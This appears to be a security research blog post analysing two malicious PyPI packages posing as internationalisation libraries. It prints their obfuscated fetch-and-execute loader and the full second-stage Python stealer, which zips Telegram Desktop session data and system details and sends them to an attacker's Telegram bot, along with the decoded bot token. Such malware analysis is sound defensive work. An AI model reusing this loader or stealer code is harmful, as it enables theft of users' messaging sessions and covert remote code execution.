Obfuscated PyPI Packages Purporting to be i18n Libraries Actually Stealing Telegram Data

Obfuscated PyPI Packages Purporting to be i18n Libraries Actually Stealing Telegram Data

Phylum discovered two packages published to PyPI on October 28 that claim to be libraries for simplifying internationalization. The files were highly obfuscated and upon further inspection were found to contain malicious code designed to steal sensitive Telegram Desktop application data and system information, which it then sends to an attacker-controlled Telegram channel.

--cta--

Overview

The packages in question are called localization-utils and locute. localization-utils was published first and went through four iterations over ~30 minutes. A few hours later the locute package was published and went through five iterations over ~90 minutes. The changes across version releases were minimal and seemed mostly to do with trying to get the MEMORY_OFFSET constant imported correctly (more on this later). In both packages, the obfuscated code ends up pulling a non-obfuscated final malicious payload from a remote Pastebin URL that is dynamically executed.

The Obfuscated Code

In both packages the file that contains the obfuscated code is called inset.py. Here is its contents:

from .utils_p.memory_normalizer import P1 as MEMORY_OFFSET
M = 0x18C

DEFAULT_LOCALE = "en"

globe = globals

_ = "".join
__ = getattr(globe()[_([chr(______) for ______ in [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]])], _([chr(______) for ______ in [103, 101, 116, 97, 116, 116, 114]]))
___ = getattr(globe()[_([chr(______) for ______ in [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]])], _([chr(______) for ______ in [95, 95, 105, 109, 112, 111, 114, 116, 95, 95]]))
____ = getattr(globe()[_([chr(______) for ______ in [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]])], _([chr(______) for ______ in [99, 104, 114]]))

def __get_kernel_ato32_locale_driver():
    __api = ___(_([____(x) for x in MEMORY_OFFSETS[:M ^ ((1 << 8) + (1 << 7) + (1 << 1))]]))
    __addr = __(__api.request, _([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 1)):M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 3) + (1 << 0))]]))(_([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 2)):]])).read()

    __(globe()[_([chr(______) for ______ in [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]])], _([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 3) + (1 << 0)):M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 2) + (1 << 0))]]))(__addr)

def __exexute_offset_moving():
    __kernel_api = ___(_([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 2) + (1 << 0)):M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 3) + (1 << 2) + (1 << 1))]]))
    __excutor = __(__kernel_api, _([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 3) + (1 << 2) + (1 << 1)):M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 2))]]))

    __excutor(target=__get_kernel_ato32_locale_driver).start()

__exexute_offset_moving()

First, it’s interesting to see the attacker goes through the effort of trying to disguise this file to look like low-level memory or kernel interaction code or something of that nature. Second, there’s a variety of obfuscation techniques present here; we see a combination of character obfuscation, dynamic function calls, and bitwise operations.

Notice the first line of this file imports what seems like a necessary memory offset constant from a “memory normalizer” utility (whatever that might be?) however, if we pull this thread what we’ll find is a bit of attempted import misdirection. Taking a look in memory_normalizar/__init__.py we’ll find the following:

from .headers import P1

__all__ = (
    "P1",
)

Looks innocuous enough, but let’s peek in memory_normalizer/headers.py. That file contains only a long list of integers:

P1 = [117, 114, 108, 108, 105, 98, 46, 114, 101, 113, 117, 101, 115, 116, 117, 114, 108, 111, 112, 101, 110, 101, 120, 101, 99, 116, 104, 114, 101, 97, 100, 105, 110, 103, 84, 104, 114, 101, 97, 100, 104, 116, 116, 112, 115, 58, 47, 47, 112, 97, 115, 116, 101, 98, 105, 110, 46, 99, 111, 109, 47, 114, 97, 119, 47, 87, 78, 114, 97, 106, 97, 86, 75]

By itself, this might seem like legitimate code in required and necessary files of an organized package, but let’s go back to inset.py knowing now that we’re importing this long list of integers into the variable MEMORY_OFFSETS. We first find reference to MEMORY_OFFSETS in the __api variable definition:

__api = ___(_([____(x) for x in MEMORY_OFFSETS[:M ^ ((1 << 8) + (1 << 7) + (1 << 1))]]))

The attacker uses a complex combination of slicing, bitwise operations, and dynamic function invocation to obscure what’s really going on here. Given the underscore variables defined earlier in the code:

  • _ is set to "".join, a function to concatenate lists of strings.
  • __ is an alias for getattr, a function to access an attribute of an object.
  • ___ is an alias for __import__, a function to import modules during runtime.
  • ____ is an alias for chr, a function to convert ASCII codes to characters.

we can evaluate the code defining __api to see that it is aliasing urllib. The next line defines __addr which, now knowing that __api is really urllib, is using the request method to a fetch something from a remote URL. Let’s quickly work through what URL is being dynamically generated here:

  1. MEMORY_OFFSETS[:M ^ ((1 << 8) + (1 << 7) + (1 << 1))]:
    • This slice operation decodes to urlib.request.
    • The bitwise operation M ^ ((1 << 8) + (1 << 7) + (1 << 1)) calculates the end index of the slice.
    • M is defined earlier as 0x18C, which is 396 in decimal. The bitwise operation results in 283, so the slice operation is equivalent to MEMORY_OFFSETS[:283].
  2. MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 1)):M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 3) + (1 << 0))]:
    • This slice decodes to urlopen, a function in the urllib.request module for opening URLs.
    • The slice is computed using bitwise operations, similar to the previous slice.
  3. MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 2)):]:
    • This slice decodes to the URL https://pastebin.com/raw/WNrajaVK, which is the target of the HTTP request.

Let’s navigate there and figure out what’s getting pulled from that URL. Here’s the code found there:

# <https://pastebin.com/WNrajaVK>

import json
import os
import platform
import socket
import subprocess
import time
import zipfile
from pathlib import Path

import requests

CHAT_ID = "-1002009496950"
TOKEN = "".join([chr(________________ ^ 257) for ________________ in [311, 312, 306, 308, 309, 305, 308, 311, 308, 305, 315, 320, 320, 324, 358, 330, 335, 376, 372, 343, 347, 375, 357, 373, 332, 344, 341, 352, 365, 366, 356, 305, 300, 331, 306, 379, 306, 365, 305, 360, 305, 361, 324, 375, 333, 324]])

def send_message(message_text):
    global TOKEN, CHAT_ID, requests

    base_url = f"<https://api.telegram.org/bot{TOKEN}/sendMessage>"

    requests.get(base_url, data={"text": message_text, "chat_id": CHAT_ID})

def send_file(file_path):
    global TOKEN, CHAT_ID, requests

    url = f"<https://api.telegram.org/bot{TOKEN}/sendDocument>"

    requests.post(
        url, data={"chat_id": CHAT_ID}, files={"document": open(file_path, "rb")}
    )

def get_system_report():
    global platform, socket, json, requests

    info = {}
    info["platform"] = platform.uname()
    info["platform-release"] = platform.release()
    info["platform-version"] = platform.version()
    info["architecture"] = platform.machine()
    info["hostname"] = socket.gethostname()
    info["ip-address"] = requests.get("<http://api.ipify.org/>").text
    info["processor"] = platform.processor()

    return json.dumps(info, indent=4)

system = platform.system()

if system == "Linux":
    tdata_dir = ".local/share/TelegramDesktop/tdata/"
else:
    tdata_dir = "AppData/Roaming/Telegram Desktop/tdata"

tdata_dir = Path.home() / Path(tdata_dir)

try:
    send_message(f"TARGET: '''{get_system_report()}'''")
    if tdata_dir.is_dir():
        subprocess.call(
            ["taskkill", "/f", "/im", "Telegram.exe"],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )

        time.sleep(0.5)

        name = ""
        with open("debug.zip", "wb") as tmp:
            zf = zipfile.ZipFile(tmp, "w")
            for path in tdata_dir.rglob("*"):
                if path.is_file():
                    if os.stat(path).st_size < 10 * 1024:
                        zf.write(path.absolute(), path)

            zf.close()

            name = tmp.name

            send_message(f"TG FOUND!!\\n{system}")

        send_file(name)
        os.remove(name)

    else:
        message_text = send_message(f"ERROR TG NOT FOUND!!\\n{system} {tdata_dir}")
except Exception as e:
    pass

Aside from the Telegram Bot Token, nothing in this file is obfuscated so it’s fairly easy to see what’s going on here. The code is designed to:

  1. Collect system information such as platform, architecture, hostname, and IP address.
  2. Search for Telegram Desktop application data and compress it into a zip file.
  3. Send the system information and compressed Telegram Desktop data to an attacker-controlled Telegram channel.

For reference, the Telegram Bot Token, obfuscated using a similar ASCII character obfuscation technique as seen in the local files, evaluates to: 6935405650:AAEgKNyuVZvdtMYTaloe0-J3z3l0i0hEvLE.

A Note About the MEMORY_OFFSET Import

As mentioned earlier, the first line of inset.py defines the import

from .utils_p.memory_normalizer import P1 as MEMORY_OFFSET

However, if you pay close attention you’ll notice that the references in the rest of the code to this variable contain an “S” at the end. E.g.

__api = ___(_([____(x) for x in MEMORY_OFFSETS[:M ^ ((1 << 8) + (1 << 7) + (1 << 1))]]))

Also mentioned earlier, our diff analyzer indicates that the only diffs between versions of localization_utils are around this import statement. Presumably this was the attacker trying to figure out why the code wasn’t working during their testing. With all the obfuscation and import misdirection it appears they simply didn’t notice a typo in the code. The code after the import references MEMORY_OFFSETS with an “S” on the end, while the import does not contain the extra “S”. This would result in a NameError at runtime and the diffs we’re seeing are most likely the attacker trying to debug this.

Conclusion

These packages show a dedicated and elaborate effort to avoid detection via static analysis and visual inspection by employing a variety of obfuscation techniques. The code initiates a series of actions that involve importing modules and functions dynamically, constructing a URL, fetching additional code, and executing it, with the end goal of stealing sensitive telegram data. These packages serve as yet another stark reminder of the critical nature of dependency trust in our open source ecosystems. Given the extensive obfuscation and the intent to mislead present in these packages, there is a substantial risk that such a package might go unnoticed even during a cursory visual inspection.

Phylum Research Team

Phylum Research Team

Hackers, Data Scientists, and Engineers responsible for the identification and takedown of software supply chain attackers.